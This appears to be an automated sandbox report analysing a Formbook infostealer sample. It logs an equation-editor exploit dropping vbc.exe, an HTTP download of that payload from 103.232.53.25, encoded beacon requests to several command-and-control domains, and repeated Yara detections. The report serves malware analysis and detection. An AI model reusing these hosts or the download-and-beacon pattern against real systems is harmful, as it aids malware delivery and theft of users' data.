          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: unknownTCP traffic detected without corresponding DNS query: 103.232.53.25
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.489138123.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.514802576.0000000001C60000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.546883814.0000000007329000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.489880080.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmpString found in binary or memory: https://www.metanetgateway.com/ddzw/
          Source: NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmpString found in binary or memory: https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0J
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AC55E10.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.spacex-live.net
          Source: global trafficHTTP traffic detected: GET /8880/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.232.53.25Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.spacex-live.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.schittstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.metanetgateway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.sarahannsartstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404FC2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
